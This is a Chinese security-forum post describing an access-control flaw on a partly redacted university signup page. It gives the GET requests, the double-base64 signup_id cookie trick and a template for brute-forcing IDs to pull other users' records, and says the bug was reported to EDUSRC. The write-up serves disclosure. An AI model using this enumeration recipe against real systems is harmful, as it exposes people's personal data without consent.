用户
搜索
  • TA的每日心情
    奋斗
    2020-12-3 11:56
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-见习白帽

    Rank: 3Rank: 3

    8

    主题

    32

    帖子

    427

    魔法币
    收听
    1
    粉丝
    1
    注册时间
    2017-12-25
    发表于 2021-3-15 23:24:49 25206
    本帖最后由 P4ssExploit 于 2021-3-15 23:27 编辑


    锦少.png
    风和日丽的一天 刷着edusrc看着锦少挖到了电大  我的内心那是羡慕嫉妒恨啊 我真惨啊  于是就有了这篇文章 (大佬们勿喷 文章很水)





    废话不多说  开干
    www.xx.edu.cn/ifree/signup.jsp?0.8750283961728511
    0.png
    出现了逻辑错误
    我的思路是先去注册一个账号
    0.png
    注册的时候要去把所有的hidden删掉  cookie是有时效性 不然注册不了
    注册.png
    接着就发现可以注册了
    1.png
    我们先注册了一个账号,其signup_id=98503
    2.png
    越权的页面在这个地方,我们去点修改信息就可以绕过cid的限制
    3.png
    用户三
    我这里发现了signup_id=50000 Cookie: 8DA3EE6316337960D9E4A51BAF2C12F3=&signup_id=TlRBd01EQT0=;
    4.png
    请求的时候直接改这个
    GET /ifree/signup_complete.jsp?signup_id=50000
    Cookie: 8DA3EE6316337960D9E4A51BAF2C12F3=&signup_id=TlRBd01EQT0=;
    5.png

    最关键的地方来了
    6.png
    7.png
    用户二
    signup_id=50001
    Cookie: 8DA3EE6316337960D9E4A51BAF2C12F3=&signup_id=TlRBd01ERT0=; 这个TlRBd01ERT0= 是50001两次base64加密
    8.png

    GET /ifree/signup_complete.jsp?signup_id=50001
    Cookie: 8DA3EE6316337960D9E4A51BAF2C12F3=&signup_id=TlRBd01ERT0=;
    9.png
    10.png
    11.png
    总结:
    并不仅仅只有这点,慢慢爆破可以搞出很多的
    获得用户信息的凭证signup_id= 和 对signup_id=进行两次base64加密
    GET /ifree/signup_complete.jsp?signup_id=数字
    Cookie: 8DA3EE6316337960D9E4A51BAF2C12F3=&signup_id=两次数字base64加密;
    注册.png
    漏洞已提交EDUSRC
    慢慢爆破就完了
    使用道具 举报 回复
    发表于 2021-4-2 15:29:01
    挺好的
    让我们一起干大事!
    有兴趣的表哥加村长QQ:780876774!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册